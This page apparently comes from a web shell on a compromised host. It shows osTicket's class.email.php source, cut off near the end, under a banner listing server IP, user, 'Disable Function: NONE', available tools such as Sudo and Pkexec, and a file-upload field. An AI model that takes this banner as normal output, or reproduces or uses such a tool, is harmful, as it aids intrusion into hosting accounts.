Server IP : 184.154.167.98 / Your IP : 52.14.229.130 Web Server : Apache System : Linux pink.dnsnetservice.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64 User : puertode ( 1767) PHP Version : 8.2.26 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/puertode/public_html/mesa/include/ |
Upload File : |
<?php /********************************************************************* class.email.php Peter Rotich <peter@osticket.com> Copyright (c) 2006-2013 osTicket http://www.osticket.com Released under the GNU General Public License WITHOUT ANY WARRANTY. See LICENSE.TXT for details. vim: expandtab sw=4 ts=4 sts=4: **********************************************************************/ require_once(INCLUDE_DIR.'laminas-mail/vendor/autoload.php'); include_once INCLUDE_DIR.'class.role.php'; include_once(INCLUDE_DIR.'class.dept.php'); include_once(INCLUDE_DIR.'class.mail.php'); include_once(INCLUDE_DIR.'class.mailer.php'); include_once(INCLUDE_DIR.'class.oauth2.php'); include_once(INCLUDE_DIR.'class.mailfetch.php'); include_once(INCLUDE_DIR.'class.mailparse.php'); include_once(INCLUDE_DIR.'api.tickets.php'); class Email extends VerySimpleModel { static $meta = array( 'table' => EMAIL_TABLE, 'pk' => array('email_id'), 'joins' => array( 'priority' => array( 'constraint' => array('priority_id' => 'Priority.priority_id'), 'null' => true, ), 'dept' => array( 'constraint' => array('dept_id' => 'Dept.id'), 'null' => true, ), 'topic' => array( 'constraint' => array('topic_id' => 'Topic.topic_id'), 'null' => true, ), 'mailbox' => array( 'reverse' => 'MailBoxAccount.account', 'list' => false, 'null' => true, ), 'smtp' => array( 'reverse' => 'SmtpAccount.account', 'list' => false, 'null' => true, ), ) ); const PERM_BANLIST = 'emails.banlist'; static protected $perms = array( self::PERM_BANLIST => array( 'title' => /* @trans */ 'Banlist', 'desc' => /* @trans */ 'Ability to add/remove emails from banlist via ticket interface', 'primary' => true, )); private $stash; private $address; function getId() { return $this->email_id; } function __toString() { return $this->getAddress(); } // TODO: move stash/restore to a StashableTrait function restore($key, $drop=true) { if (($data = $this->stash($key, null)) && $drop) $this->stash[$key] = null; return $data; } function stash($key, $data=null) { if (!isset($this->stash)) $this->stash = &$_SESSION[':email'][$this->getId()]; // If data is null then stash is being pop-ed if (!isset($data) && $key && isset($this->stash[$key])) return $this->stash[$key]; // stash data if ($key && $data) $this->stash[$key] = $data; } function stashFormData(array $data) { $this->stash('formdata', array_filter($data)); } function restoreFormData($drop=true) { return $this->restore('formdata', $drop) ?: []; } function restoreErrors($drop=true) { return $this->restore('errors', $drop) ?: []; } function restoreNotice($drop=true) { return $this->restore('notice', $drop); } function getEmail() { return $this->email; } function getAddress() { if (!isset($this->address)) $this->address = $this->name ? sprintf('%s <%s>', $this->name, $this->email) : $this->email; return $this->address; } function getName() { return $this->name; } function getPriorityId() { return $this->priority_id; } function getDeptId() { return $this->dept_id; } function getDept() { return $this->dept; } function getTopicId() { return $this->topic_id; } function getTopic() { return $this->topic; } function autoRespond() { return !$this->noautoresp; } function getHashtable() { return $this->ht; } static function getSupportedAuthTypes() { static $auths = null; if (!isset($auths)) { $auths = []; // OAuth auth foreach (Oauth2AuthorizationBackend::allRegistered() as $id => $bk) $auths[$id] = $bk->getName(); // Basic authentication $auths['basic'] = sprintf('%s (%s)', __('Basic Authentication'), __('Legacy')); } return $auths; } static function getSupportedSMTPAuthTypes() { return array_merge([ 'mailbox' => sprintf('%s %s', __('Same as'), __('Remote Mailbox')), 'none' => sprintf('%s - %s', __('None'), __('No Authentication Required'))], self::getSupportedAuthTypes()); } function getInfo() { // Base information mimus objects $info = array_filter($this->getHashtable(), function($e) { return !is_object($e); }); // Remote Mailbox Info if (($mailbox=$this->getMailBoxAccount())) $info = array_merge($info, $mailbox->getInfo()); // SMTP Account Info if (($smtp=$this->getSmtpAccount())) $info = array_merge($info, $smtp->getInfo()); // Restore stahed formdata (if any) if ($_SERVER['REQUEST_METHOD'] == 'GET' && ($data=$this->restoreFormData())) $info = array_merge($info, $data); return $info; } function getMailBoxAccount($autoinit=true) { if (!$this->mailbox && isset($this->email_id) && $autoinit) $this->mailbox = MailBoxAccount::create([ 'email_id' => $this->email_id]); return $this->mailbox; } function getSmtpAccount($autoinit=true) { if (!$this->smtp && isset($this->email_id) && $autoinit) $this->smtp = SmtpAccount::create([ 'email_id' => $this->email_id]); return $this->smtp; } function getAuthAccount($which) { $account = null; switch ($which) { case 'mailbox': $account = $this->getMailBoxAccount(); break; case 'smtp': $account = $this->getSmtpAccount(); break; } return $account; } function send($to, $subject, $message, $attachments=null, $options=null, $cc=array()) { $mailer = new osTicket\Mail\Mailer($this); if($attachments) $mailer->addAttachments($attachments); return $mailer->send($to, $subject, $message, $options, $cc); } function sendAutoReply($to, $subject, $message, $attachments=null, $options=array()) { $options+= array('autoreply' => true); return $this->send($to, $subject, $message, $attachments, $options); } function sendAlert($to, $subject, $message, $attachments=null, $options=array()) { $options+= array('notice' => true); return $this->send($to, $subject, $message, $attachments, $options); } function delete() { global $cfg; //Make sure we are not trying to delete default emails. if(!$cfg || $this->getId()==$cfg->getDefaultEmailId() || $this->getId()==$cfg->getAlertEmailId()) //double...double check. return 0; if (!parent::delete()) return false; $type = array('type' => 'deleted'); Signal::send('object.deleted', $this, $type); // Delete email accounts if ($this->mailbox) $this->mailbox->delete(); if ($this->smtp) $this->smtp->delete(); Dept::objects() ->filter(array('email_id' => $this->getId())) ->update(array( 'email_id' => $cfg->getDefaultEmailId() )); Dept::objects() ->filter(array('autoresp_email_id' => $this->getId())) ->update(array( 'autoresp_email_id' => 0, )); return true; } function save($refetch=false) { if ($this->dirty) $this->updated = SqlFunction::NOW(); return parent::save($refetch || $this->dirty); } function update($vars, &$errors=false) { global $cfg; // very basic checks $vars['name'] = Format::striptags(trim($vars['name'])); $vars['email'] = trim($vars['email']); $id = isset($this->email_id) ? $this->getId() : 0; if ($id && $id != $vars['id']) $errors['err']=__('Get technical help!') .' '.__('Internal error occurred'); if (!$vars['email'] || !Validator::is_email($vars['email'])) { $errors['email']=__('Valid email required'); } elseif (($eid=Email::getIdByEmail($vars['email'])) && $eid != $id) { $errors['email']=__('Email already exists'); } elseif ($cfg && !strcasecmp($cfg->getAdminEmail(), $vars['email'])) { $errors['email']=__('Email already used as admin email!'); } elseif (Staff::getIdByEmail($vars['email'])) { //make sure the email doesn't belong to any of the staff $errors['email']=__('Email in use by an agent'); } if (!$vars['name']) $errors['name']=__('Email name required'); /* TODO: ??? $dept = Dept::lookup($vars['dept_id']); if($dept && !$dept->isActive()) $errors['dept_id'] = ''; $topic = Topic::lookup($vars['topic_id']); if($topic && !$topic->isActive()) $errors['topic_id'] = ''; */ // Remote Mailbox Settings if (($mailbox = $this->getMailBoxAccount())) $mailbox->update($vars, $errors); // SMTP Settings if (($smtp = $this->getSmtpAccount())) $smtp->update($vars, $errors); //abort on errors if ($errors) return false; if ($errors) return false; // Update basic settings $this->email = Format::sanitize($vars['email']); $this->name = Format::striptags($vars['name']); $this->dept_id = (int) $vars['dept_id']; $this->priority_id = (int) (isset($vars['priority_id']) ? $vars['priority_id'] : 0); $this->topic_id = (int) $vars['topic_id']; $this->noautoresp = (int) $vars['noautoresp']; $this->notes = Format::sanitize($vars['notes']); if ($this->save()) return true; if ($id) { //update $errors['err'] = sprintf(__('Unable to update %s.'), __('this email')) .' '.__('Internal error occurred'); } else { $errors['err'] = sprintf(__('Unable to add %s.'), __('this email')) .' '.__('Internal error occurred'); } return false; } static function getIdByEmail($email) { $qs = static::objects()->filter(Q::any(array( 'email' => $email, ))) ->values_flat('email_id'); $row = $qs->first(); return $row ? $row[0] : false; } static function create($vars=false) { $inst = new static($vars); $inst->created = SqlFunction::NOW(); return $inst; } static function getAddresses($options=array(), $flat=true) { $objects = static::objects(); if ($options['smtp']) $objects = $objects->filter(array('smtp__active' => 1)); if ($options['depts']) $objects = $objects->filter(array('dept_id__in'=>$options['depts'])); if (!$flat) return $objects; $addresses = array(); foreach ($objects->values_flat('email_id', 'email') as $row) { list($id, $email) = $row; $addresses[$id] = $email; } return $addresses; } static function getPermissions() { return self::$perms; } // Supported Remote Mailbox protocols static function mailboxProtocols() { return [ 'IMAP' => 'IMAP', 'POP' => 'POP']; } } RolePermission::register(/* @trans */ 'Miscellaneous', Email::getPermissions()); class EmailAccount extends VerySimpleModel { static $meta = array( 'table' => EMAIL_ACCOUNT_TABLE, 'pk' => array('id'), 'joins' => array( 'email' => array( 'constraint' => array('email_id' => 'Email.email_id'), ), ), ); private $bkId; private $form; private $cred; private $config; private $instance; // If account supports tls or ssl private $encryption = false; // Account settings private $settings; public function getAccountSetting($stashed=false) { if (!isset($this->settings)) { // Set properties to stashed form data (if any and requested) if ($stashed && ($info=$this->getInfo())) { foreach (['host', 'port', 'protocol'] as $p) { $k = "{$this->type}_$p"; if (isset($info[$k])) $this->{$p} = $info[$k]; } } $this->settings = new osTicket\Mail\AccountSetting($this); } return $this->settings; } public function getHostInfo() { return $this->getAccountSetting()->getHostInfo(); } public function getHost() { return $this->host; } public function getPort() { return $this->port; } public function getProtocol() { return $this->protocol; } public function getNumErrors() { return $this->num_errors; } public function isOAuthAuth() { return str_starts_with($this->getAuthBk(), 'oauth'); } public function isBasicAuth() { return str_starts_with($this->getAuthBk(), 'basic'); } public function isActive() { return ($this->active && $this->hasCredentials()); } // **** Don't use it **** // This routine is depricated and will be removed in the future - OAuth2 // Plugin uses it to check if the email accout has auth2 backend. public function isEnabled() { return $this->isOAuthAuth(); } public function isAuthBackendEnabled() { return $this->isOAuthAuth() ? (($i=$this->getOAuth2Instance()) && $i->isEnabled()) : true; } public function isStrict() { return $this->getConfig()->getStrictMatching(); } public function checkStrictMatching($token=null) { $token ??= $this->getAccessToken(); return ($token && $token->isMatch( $this->getEmail()->getEmail(), $this->isStrict())); } public function shouldAuthorize() { // check status and make sure it's oauth if (!$this->isAuthBackendEnabled() || !$this->isOAuthAuth()) return false; return (!($cred=$this->getFreshCredentials()) // Get token with signature match - mismatch means config // changed somehow || !($token=$cred->getAccessToken($this->getConfigSignature())) // Check if expired || $token->isExpired() // If Strict Matching is enabled ensure the email matches // the Resource Owner || !$this->checkStrictMatching($token)); } public function getId() { return $this->id; } public function getType() { return $this->type; } public function getAuthBk() { return $this->auth_bk; } public function getAuthId() { return $this->auth_id; } public function getBkId() { if (!isset($this->bkId)) { $id = sprintf('%s:%d', $this->getAuthBk(), $this->getId()); if ($this->isOAuthAuth()) $id .= sprintf(':%d:%b', $this->getAuthId(), $this->isStrict()); #TODO: Remove strict and delegate to email account $this->bkId = $id; } return $this->bkId; } public function getEmailId() { return $this->email_id; } public function getEmail() { return $this->email; } public function getName() { return $this->getEmail()->getName(); } public function getAccessToken() { $cred = $this->getFreshCredentials(); return $cred ? $cred->getAccessToken($this->getConfigSignature()) : null; } private function getOAuth2Backend($auth=null) { $auth = $auth ?: $this->getAuthBk(); return Oauth2AuthorizationBackend::getBackend($auth); } public function getOAuth2ConfigDefaults() { $email = $this->getEmail(); return [ 'auth_type' => 'autho', 'auth_name' => $email->getName(), 'name' => sprintf('%s (%s)', $email->getEmail(), $this->getType()), 'isactive' => 1, 'strict_matching' => $this->isStrict(), 'notes' => sprintf( __('OAuth2 Authorization for %s'), $email->getEmail()), ]; } public function getOAuth2ConfigInfo() { $vars = $this->getOAuth2ConfigDefaults(); if (($i=$this->getOAuth2Instance())) $vars = array_merge($vars, $i->getInfo()); return $vars; } private function getOAuth2ConfigForm($vars, $auth=null) { // Lookup OAuth2 backend & Get basic config form if (($bk=$this->getOAuth2Backend($auth))) return $bk->getConfigForm( array_merge( $this->getOAuth2ConfigDefaults(), $vars ?: $bk->getDefaults() #nolint ), !strcmp($auth, $this->getAuthBk()) ? $this->getAuthId() : null ); } private function getBasicAuthConfigForm($vars, $auth=null) { $creds = $this->getCredentialsVars($auth) ?: []; if (!$vars && $creds) { $vars = [ 'username' => $creds['username'], 'passwd' => $creds['password'], ]; } elseif (!$_POST && !isset($vars['username']) && $this->email) $vars['username'] = $this->email->getEmail(); if (!isset($vars['passwd']) && $_POST && $creds) $vars['passwd'] = $creds['password']; return new BasicAuthConfigForm($vars); } public function getOAuth2Instance($bk=null) { $bk = $bk ?: $this->getOAuth2Backend(); if (!isset($this->instance) && $this->getAuthId() && $bk) $this->instance = $bk->getPluginInstance($this->getAuthId()); return $this->instance; } public function getConfigSignature() { if (($i=$this->getOAuth2Instance())) return $i->getSignature(); } public function getInfo() { $ht = array(); foreach (static::$vars as $var) { if (isset($this->ht[$var])) $ht[$this->type.'_'.$var] = $this->ht[$var]; } // Add stashed info (if any) if (($data=$this->email->restoreFormData(false))) $ht = array_merge($ht, $data); return $ht; } private function getNamespace() { return sprintf('email.%d.account.%d', $this->getEmailId(), $this->getId()); } protected function getConfig() { if (!isset($this->config)) $this->config = new EmailAccountConfig($this->getNamespace()); return $this->config; } public function getAuthConfigForm($auth, $vars=false) { if (!isset($this->form) || strcmp($auth, $this->getAuthBk())) { list($type, $provider) = explode(':', $auth); switch ($type) { case 'oauth2': $this->form = $this->getOAuth2ConfigForm($vars, $auth); break; case 'basic': $this->form = $this->getBasicAuthConfigForm($vars, $auth); $setting = $this->getAccountSetting(true); if (!$setting || !$setting->isValid()) $this->form->setNotice( __('Host, Port & Protocol Required')); break; } } return $this->form; } public function saveAuth($auth, $form, &$errors) { // Validate the form if (!$form->isValid()) return false; $vars = $form->getClean(); list($type, $provider) = explode(':', $auth); switch ($type) { case 'basic': // Set username and password if (!$this->updateCredentials($auth, $vars, $errors) && !isset($errors['err'])) $errors['err'] = sprintf('%s %s', __('Error Saving'), __('Authentication')); break; case 'oauth2': // For OAuth we are simply saving configuration - // credetials are saved post successful authorization // redirect. // Lookup OAuth backend if (($bk=$this->getOAuth2Backend($auth))) { // Merge form data, post vars and any defaults $vars = array_merge($this->getOAuth2ConfigDefaults(), array_intersect_key($_POST, $this->getOAuth2ConfigDefaults()), $vars); // Update or add OAuth2 instance if ($this->getAuthId() && ($i=$bk->getPluginInstance($this->getAuthId()))) { $vars = array_merge($bk->getDefaults(), $vars); #nolint if ($i->update($vars, $errors)) { // Disable account if backend is changed if (strcasecmp($this->auth_bk, $auth)) $this->active = 0; // Auth backend can be changed on update $this->auth_bk = $auth; $this->save(); // Update Strict Matching $this->getConfig()->setStrictMatching($_POST['strict_matching'] ? 1 : 0); } elseif (!isset($errors['err'])) { $errors['err'] = sprintf('%s %s', __('Error Saving'), __('Authentication')); } } else { // Ask the backend to add OAuth2 instance for this account if (($i=$bk->addPluginInstance($vars, $errors))) { #nolint // Cache instance $this->instance = $i; $this->auth_bk = $auth; $this->auth_id = $i->getId(); $this->save(); } else { $errors['err'] = __('Error Adding OAuth2 Instance'); } } } break; default: $errors['err'] = __('Unknown Authentication Type'); } return !($errors); } public function logError($error) { return $this->logActivity($error); } public function hasCredentials() { return ($this->getFreshCredentials()); } private function getCredentialsVars($auth=null) { $vars = []; if (($cred = $this->getCredentials($auth))) $vars = $cred->toArray(); return $vars; } public function getFreshCredentials($auth=null) { return $this->getCredentials($auth, true); } public function getCredentials($auth=null, $refresh=false) { // Authentication doesn't match - it's getting reconfigured. if ($auth && strncasecmp($this->getAuthBk(), $auth, strlen($auth)) && !in_array($auth, ['none', 'mailbox'])) return []; if (!isset($this->cred) || $refresh) { $this->cred = $cred = null; $auth = $auth ?: $this->getAuthBk(); list($type, $provider) = explode(':', $auth); try { switch ($type) { case 'mailbox': $cred = $this->getMailBoxCredentials($refresh); break; case 'none': // No authentication required (open replay) $cred = new osTicket\Mail\NoAuthCredentials([ 'username' => $this->email->getEmail()]); break; case 'basic': $cred = $this->getBasicAuthCredentials(); break; case 'oauth2': $cred = $this->getOAuth2AuthCredentials($provider, $refresh); break; default: throw new Exception(sprintf('%s: %s', $type, __('Unknown Credential Type'))); } // Cache the credentials $this->cred = $cred; } catch (Exception $ex) { // Log the error $this->logError(sprintf('%s: %s', __('Credentials'), $ex->getMessage() )); } } return $this->cred; } private function getMailBoxCredentials($refresh=false) { if (($mb=$this->email->getMailBoxAccount()) && $mb->getAuthBk()) return $mb->getCredentials($mb->getAuthBk(), $refresh); } private function getBasicAuthCredentials() { if (($c=$this->getConfig()) && ($creds=$c->toArray()) && isset($creds['username']) && isset($creds['passwd'])) { return new osTicket\Mail\BasicAuthCredentials([ 'username' => $creds['username'], // Decrypt password 'password' => Crypto::decrypt($creds['passwd'], SECRET_SALT, md5($creds['username'].$this->getNamespace())) ]); } } private function updateBasicAuthCredentials($vars, &$errors) { // Get current credentials - we need to re-encrypt // password as username might be changing $creds = $this->getCredentialsVars('basic'); // password change? if (!$vars['username']) { $errors['username'] = __('Username Required'); } elseif (!$vars['passwd'] && !$creds['password']) { $errors['passwd'] = __('Password Required'); } elseif (($setting=$this->getAccountSetting(true)) && !$setting->isValid()) { $errors['err'] = implode(', ', $setting->getErrors()); } elseif ($setting && !$errors) { // Validate the credentials try { $cred = new osTicket\Mail\BasicAuthCredentials([ 'username' => $vars['username'], 'password' => $vars['passwd'] ?: $creds['password'], ]); if (!$this->validateCredentials($cred)) $errors['err'] = __('Invalid Credentials'); } catch (Exception $ex) { $errors['err'] = $ex->getMessage(); } } if (!$errors) { // Save credentials and get out of here. $info = [ // username 'username' => $vars['username'], // Encrypt password 'passwd' => Crypto::encrypt($vars['passwd'] ?: $creds['password'], SECRET_SALT, md5($vars['username'].$this->getNamespace())) ]; if (!$this->getConfig()->updateInfo($info)) $errors['err'] = sprintf('%s: %s', __('BasicAuth'), __('Error saving credentials')); } return !count($errors); } private function getOAuth2AuthCredentials($provider, $refresh=false) { if (!($c=$this->getConfig())) return false; $creds=$c->toArray(); // Decrypt Access Token if ($creds['access_token']) { $creds['access_token'] = Crypto::decrypt( $creds['access_token'], SECRET_SALT, md5($creds['resource_owner_email'].$this->getNamespace()) ); } // Decrypt Referesh Token if ($creds['refresh_token']) { $creds['refresh_token'] = Crypto::decrypt( $creds['refresh_token'], SECRET_SALT, md5($creds['resource_owner_email'].$this->getNamespace()) ); } try { // Init credentials and see of we need to // refresh the token $errors = []; $auth = sprintf('oauth2:%s', $provider); $class = 'osTicket\Mail\OAuth2AuthCredentials'; if (($cred=$class::init($creds)) && ($token=$cred->getToken()) && ($refresh && $token->isExpired()) && ($bk=$this->getOAuth2Backend()) && ($info=$bk->refreshAccessToken( #nolint $token->getRefreshToken(), $this->getBkId(), $errors)) && isset($info['access_token']) && $this->updateCredentials($auth, // Merge new access token with // already decrypted creds array_merge($creds, $info), $errors )) { return $this->getCredentials($auth, $refresh); } elseif ($errors) { // Throw an exception with the error throw new Exception($errors['refresh_token'] ?? __('Referesh Token Expired')); } } catch (Exception $ex) { // rethrow the exception including above. throw $ex; } return $cred; } private function updateOAuth2AuthCredentials($provider, $vars, &$errors) { if (!$vars['access_token']) { $errors['access_token'] = __('Access Token Required'); } elseif (!$vars['resource_owner_email'] || !Validator::is_email($vars['resource_owner_email'])) { $errors['resource_owner_email'] = __('Resource Owner Required'); } elseif (!$errors) { // Encrypt Access Token $vars['access_token'] = Crypto::encrypt( $vars['access_token'], SECRET_SALT, md5($vars['resource_owner_email'].$this->getNamespace())); // Encrypt Referesh Token if ($vars['refresh_token']) { $vars['refresh_token'] = Crypto::encrypt( $vars['refresh_token'], SECRET_SALT, md5($vars['resource_owner_email'].$this->getNamespace()) ); } $vars['config_signature'] = $this->getConfigSignature(); // TODO: Validate if (!$this->getConfig()->updateInfo($vars)) $errors['err'] = sprintf('oauth2:%s - %s', Format::htmlchars($provider), __('Error saving credentials')); } return !count($errors); } public function updateCredentials($auth, $vars, &$errors) { if (!$vars || $errors) return false; list($type, $provider) = explode(':', $auth); switch ($type) { case 'basic': if (!($this->updateBasicAuthCredentials($vars, $errors))) return false; break; case 'oauth2': if (!($this->updateOAuth2AuthCredentials($provider, $vars, $errors))) return false; break; default: $errors['err'] = sprintf('%s - %s', __('Unknown Authentication'), Format::htmlchars($auth)); } if ($errors) return false; // Save the auth backend $this->auth_bk = $auth; // Clear cached credentials $this->creds = null; return $this->save(); } /* * Destory the account config */ function destroyConfig() { return $this->getConfig()->destroy(); } function update($vars, &$errors) { return false; } public function logActivity($error=null, $now=null) { if (isset($error)) { $this->num_errors += 1; $this->last_error_msg = $error; $this->last_error = $now ?: SqlFunction::NOW(); } else { $this->num_errors = 0; $this->last_error = null; $this->last_error_msg = null; $this->last_activity = $now ?: SqlFunction::NOW(); } return $this->save(); } function save($refetch=false) { if ($this->dirty) { $this->updated = SqlFunction::NOW(); } return parent::save($refetch || $this->dirty); } function delete() { // Destroy the Email config $this->destroyConfig(); // Delete the Plugin instance if ($this->isOAuthAuth() && ($i=$this->getOAuth2Instance())) $i->delete(); // Delete the EmailAccount parent::delete(); } static function create($ht=false) { $i = new static($ht); $i->active = isset($ht['active']) ? $ht['active'] : 0; $i->created = SqlFunction::NOW(); return $i; } } class MailBoxAccount extends EmailAccount { static $meta = array( 'table' => EMAIL_ACCOUNT_TABLE, 'pk' => array('id'), 'joins' => array( 'email' => array( 'constraint' => array('email_id' => 'Email.email_id'), ), 'account' => array( 'constraint' => array( 'type' => "'mailbox'", 'email_id' => 'Email.email_id'), ), ), ); static protected $vars = [ 'active', 'host', 'port', 'protocol', 'auth_bk', 'folder', 'fetchfreq', 'fetchmax', 'postfetch', 'archivefolder' ]; private $cred; private $mailbox; static public function objects() { return parent::objects() ->filter(['type' => 'mailbox']); } //TODO: Morhp MailBoxAccount to ImapMailBoxAccount public function isImap() { return (strcasecmp($this->getProtocol(), 'IMAP') === 0); } //TODO: Morhp MailBoxAccount to PopMailBoxAccount public function isPop() { return (strcasecmp($this->getProtocol(), 'POP') === 0); } public function getProtocol() { return $this->protocol; } public function getFolder() { return $this->folder; } public function getFetchFolder() { return $this->getFolder(); } public function getArchiveFolder() { return ($this->isImap() && $this->archivefolder) ? $this->archivefolder : null; } public function canDeleteEmails() { return !strcasecmp($this->postfetch, 'delete'); } public function getMaxFetch() { return $this->fetchmax; } protected function validateCredentials(osTicket\Mail\AuthCredentials $creds) { return $this->getMailBox($creds); } public function getMailBox(osTicket\Mail\AuthCredentials $cred=null) { if (!isset($this->mailbox) || $cred) { $this->cred = $cred ?: $this->getFreshCredentials(); $setting = $this->getAccountSetting(); $setting->setCredentials($this->cred); switch (strtolower($this->getProtocol())) { case 'imap': $mailbox = new osTicket\Mail\Imap($setting); break; case 'pop3': case 'pop': $mailbox = new osTicket\Mail\Pop3($setting); break; default: throw new Exception('Unknown Mail protocol: '.$this->getProtocol()); } $this->mailbox = $mailbox; } return $this->mailbox; } public function fetchEmails() { try { $this->logLastFetch(); $fetcher = new osTicket\Mail\Fetcher($this); return $fetcher->processEmails(); } catch (Throwable $t) { // May throw an Exception or Error // Log the message $this->logFetchError($t->getMessage()); // rethrow the throwable so caller can handle it throw $t; } return 0; } protected function setInfo($vars, &$errors) { $creds = null; if ($vars['mailbox_active']) { if (!$vars['mailbox_host']) $errors['mailbox_host'] = __('Host name required'); if (!$vars['mailbox_port']) $errors['mailbox_port'] = __('Port required'); if (!$vars['mailbox_protocol']) $errors['mailbox_protocol'] = __('Select protocol'); elseif (!in_array($vars['mailbox_protocol'], Email::mailboxProtocols())) $errors['mailbox_protocol'] = __('Invalid protocol'); if (!$vars['mailbox_auth_bk']) $errors['mailbox_auth_bk'] = __('Select Authentication'); if (!$vars['mailbox_fetchfreq'] || !is_numeric($vars['mailbox_fetchfreq'])) $errors['mailbox_fetchfreq'] = __('Fetch interval required'); if (!$vars['mailbox_fetchmax'] || !is_numeric($vars['mailbox_fetchmax'])) $errors['mailbox_fetchmax'] = __('Maximum emails required'); if ($vars['mailbox_protocol'] == 'POP' && !empty($vars['mailbox_folder'])) $errors['mailbox_folder'] = __('POP mail servers do not support folders'); if (!$vars['mailbox_postfetch']) $errors['mailbox_postfetch'] = __('Indicate what to do with fetched emails'); } if (!strcasecmp($vars['mailbox_postfetch'], 'archive')) { if ($vars['mailbox_protocol'] == 'POP') $errors['mailbox_postfetch'] = __('POP mail servers do not support folders'); elseif (!$vars['mailbox_archivefolder']) $errors['mailbox_postfetch'] = __('Valid folder required'); elseif (!strcasecmp($vars['mailbox_folder'], $vars['mailbox_archivefolder'])) $errors['mailbox_postfetch'] = __('Archive folder cannot be same as fetched folder (INBOX)'); } // Make sure authentication is configured if selection is made if ($vars['mailbox_auth_bk'] && !($creds=$this->getFreshCredentials($vars['mailbox_auth_bk']))) $errors['mailbox_auth_bk'] = __('Configure Authentication'); if (!$errors) { $this->active = $vars['mailbox_active'] ? 1 : 0; $this->host = $vars['mailbox_host']; $this->port = $vars['mailbox_port'] ?: 0; $this->protocol = $vars['mailbox_protocol']; $this->auth_bk = $vars['mailbox_auth_bk'] ?: null; $this->folder = $vars['mailbox_folder'] ?: null; $this->fetchfreq = $vars['mailbox_fetchfreq'] ?: 5; $this->fetchmax = $vars['mailbox_fetchmax'] ?: 30; $this->postfetch = $vars['mailbox_postfetch']; $this->last_activity = null; $this->last_error_msg = null; $this->num_errors = 0; //Post fetch email handling... switch ($vars['mailbox_postfetch']) { case 'archive': $this->archivefolder = $vars['mailbox_archivefolder']; break; case 'delete': default: $this->archivefolder = null; } // If mailbox is active and we have credentials then attemp to // authenticate if ($this->active && $creds) { try { // Get mailbox (Storage Backend) if (($mb=$this->getMailBox($creds))) { if ($this->folder && !$mb->hasFolder($this->folder)) $errors['mailbox_folder'] = __('Unknown Folder'); if ($this->archivefolder && $this->isImap() && !$mb->hasFolder($this->archivefolder) && !$mb->createFolder($this->archivefolder)) $errors['mailbox_archivefolder'] = __('Unable to create Folder'); } else { $errors['mailbox_auth'] = __('Authentication Error'); } } catch (Exception $ex) { $errors['mailbox_auth'] = $ex->getMessage(); } } } return !$errors; } public function logLastFetch($now=null) { return $this->logActivity(null, $now); } private function logFetchError($error) { return $this->logActivity($error ?: __('Mail Fetch Error')); } public function update($vars, &$errors) { if (!$this->setInfo($vars, $errors)) return false; return $this->save(); } static function create($ht=false) { $i = parent::create($ht); $i->type = 'mailbox'; return $i; } } class SmtpAccount extends EmailAccount { static $meta = array( 'table' => EMAIL_ACCOUNT_TABLE, 'pk' => array('id'), 'joins' => array( 'email' => array( 'constraint' => array('email_id' => 'Email.email_id'), ), 'account' => array( 'constraint' => array( 'type' => "'smtp'", 'email_id' => 'Email.email_id'), ), ), ); static protected $vars = [ 'active', 'host', 'port', 'protocol', 'auth_bk', 'allow_spoofing' ]; private $smtp; private $cred; static public function objects() { return parent::objects() ->filter(['type' => 'smtp']); } public function isMailboxAuth() { return (strcasecmp($this->getAuthBk(), 'mailbox') === 0); } /* * Check if using mailbox auth and MailboxAccount exists if so * return the MailboxAccount config, otherwise return it's own * config */ protected function getConfig() { if ($this->isMailboxAuth() && ($email=$this->getEmail()) && ($account=$email->getMailBoxAccount())) return $account->getConfig(); return parent::getConfig(); } public function allowSpoofing() { return ($this->allow_spoofing); } protected function validateCredentials(osTicket\Mail\AuthCredentials $creds) { return $this->getSmtp($creds); } public function getSmtpConnection() { $this->smtp = $this->getSmtp(); if (!$this->smtp->connect()) return false; return $this->smtp; } public function getSmtp(osTicket\Mail\AuthCredentials $cred=null) { if (!isset($this->smtp) || $cred) { $this->cred = $cred ?: $this->getFreshCredentials(); if ($this->cred) { $setting = $this->getAccountSetting(); $setting->setCredentials($this->cred); $smtpOptions = new osTicket\Mail\SmtpOptions($setting); $smtp = new osTicket\Mail\Smtp($smtpOptions); // Attempt to connect now if credentials are sent in if ($cred) $smtp->connect(); $this->smtp = $smtp; } } return $this->smtp; } protected function setInfo($vars, &$errors) { $creds = null; $_errors = []; if ($vars['smtp_active']) { if (!$vars['smtp_host']) $_errors['smtp_host'] = __('Host name required'); if (!$vars['smtp_port']) $_errors['smtp_port'] = __('Port required'); if (!$vars['smtp_auth_bk']) $_errors['smtp_auth_bk'] = __('Select Authentication'); elseif (!($creds=$this->getFreshCredentials($vars['smtp_auth_bk']))) $_errors['smtp_auth_bk'] = ($vars['smtp_auth_bk'] == 'mailbox') ? __('Configure Mailbox Authentication') : __('Configure Authentication'); } elseif ($vars['smtp_auth_bk'] // We default to mailbox - so we're not going to check // unless account is active, see above! && strcasecmp($vars['smtp_auth_bk'], 'mailbox') && !($creds=$this->getFreshCredentials($vars['smtp_auth_bk']))) $_errors['smtp_auth_bk'] = __('Configure Authentication'); // Check if set to active and using mailbox auth, if so check strict // matching. if ($vars['smtp_active'] == 1 && ($vars['smtp_auth_bk'] === 'mailbox') && (strpos($vars['auth_bk'], 'oauth2') === 0) && !$this->checkStrictMatching()) $_errors['smtp_auth_bk'] = sprintf('%s and %s', __('Resource Owner'), __('Email Mismatch')); if (!$_errors) { $this->active = $vars['smtp_active'] ? 1 : 0; $this->host = $vars['smtp_host']; $this->port = $vars['smtp_port'] ?: 0; $this->auth_bk = $vars['smtp_auth_bk'] ?: null; $this->protocol = 'SMTP'; $this->allow_spoofing = $vars['smtp_allow_spoofing'] ? 1 : 0; $this->last_activity = null; $this->last_error_msg = null; $this->num_errors = 0; // If account is active then attempt to authenticate if ($this->active && $creds) { try { if (!($smtp=$this->getSmtp($creds))) $_errors['smtp_auth'] = __('Authentication Error'); } catch (Exception $ex) { $_errors['smtp_auth'] = $ex->getMessage(); } } } $errors = array_merge($errors, $_errors); return !$errors; } function update($vars, &$errors) { if (!$this->setInfo($vars, $errors)) return false; return $this->save(); } static function create($ht=false) { $i = parent::create($ht); $i->type = 'smtp'; return $i; } } /* * Email Config Store * * Extends base central config store * */ class EmailAccountConfig extends Config { /* * Get strict matching (default: true) */ public function getStrictMatching() { return $this->get('strict_matching', true); } /* * Set strict matching */ public function setStrictMatching($mode) { return 